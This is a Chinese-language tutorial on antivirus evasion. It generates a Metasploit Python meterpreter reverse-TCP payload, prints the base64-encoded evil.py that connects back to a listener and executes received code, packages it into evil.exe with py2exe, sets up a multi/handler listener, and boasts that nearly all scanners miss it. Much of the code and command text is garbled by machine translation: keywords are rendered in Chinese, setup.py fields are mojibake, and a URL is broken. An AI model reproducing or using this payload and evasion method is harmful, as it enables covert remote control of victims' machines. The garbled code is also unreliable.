使用Python进行防病毒免杀解析

  

很多渗透工具都提供了权限维持的能力,如Metasploit,帝国和钴罢工,但是都会被防病毒软件检测到这种恶意行为。在探讨一个权限维持技巧的时候,似乎越来越多的人关注的是,这个方式会不会被被杀软杀掉?
  

  

打造免杀的载荷成了一个很重要的话题,在这里,本文将介绍如何使用Pyhton轻松绕过防病毒软件。

  

  

<强> 1,软件安装

  

Python 2.7.16 x86: https://www.python.org/ftp/python/2.7.16/python-2.7.16.msi
  Py2exe 32位:https://sourceforge.net/projects/py2exe/files/py2exe/0.6.9/py2exe-0.6.9.win32-py2.7.exe/download

  

<强> 2,msfvenom生成Python载荷

        msfvenom - p python/meterpreter reverse_tcp LHOST=192.168.28.128 LPORT=443 - f生- o/var/www/html/evil.py      

使用Python进行防病毒免杀解析

  

邪恶。py代码如下:

        进口base64, sys, exec (base64。b64decode ({2: str, 3:λb:字节(b,“utf - 8”)} [sys.version_info [0]] (“aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMjguMTI4Jyw0NDMpKQoJCWJyZWFrCglleGNlcHQ6CgkJdGltZS5zbGVlcCg1KQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKGQseydzJzpzfSkK”)))      

  

将evil.py复制到窗口,同时创建一个setup . py文件:

        distutils。核心进口设置   进口py2exe   设置(   name=凹啤?   描述=懊嫦蛴τ谩?   version=' 1.0 ',   控制台=[' evil.py '),   选项={py2exe: {“bundle_files”: 1、“包”:“ctypes”,“包括”:“sys base64,插座、结构、时间、代码、平台、getpass, shutil’,}},   zipfile=没有   )      

下面的方法运行evil.py,生成可执行文件。

  

<代码> python。/设置。py py2exe

  

使用Python进行防病毒免杀解析

  

  

卡莉运行Metasploit,设置监听:

        msfconsole   使用开发/多/处理程序   设置python/meterpreter/reverse_tcp载荷   设置LHOST 192.168.28.128   设置LPORT 443   运行      

在Windows中运行evil.exe,获得一个meterpreter的会话

  

使用Python进行防病毒免杀解析

  

  

确认生成的exe文件可正常工作,接下来对邪恶的。exe进行在线病毒扫描,以确认免杀效果如何。
  这里我们使用VirSCAN.org多引擎在线病毒扫描网v1.02,当前支持47款杀毒引擎
  

  

使用Python进行防病毒免杀解析

  

扫描结果:47款杀毒引擎中,只有一个引擎报毒,主流的杀毒软件全部绕过。

  

网站地址:http://www.virscan.org 

  

参考文章:

  

https://medium.com/bugbountywriteup/antivirus -逃避-与- python - 49185295 caf1

  

  

以上所述是小编给大家介绍的使用Python进行防病毒免杀,希望对大家有所帮助,如果大家有任何疑问请给我留的言,小编会及时回复大家的。在此也非常感谢大家对网站的支持。
  如果你觉得本文对你有帮助,欢迎转载,烦请注明出处,谢谢!

使用Python进行防病毒免杀解析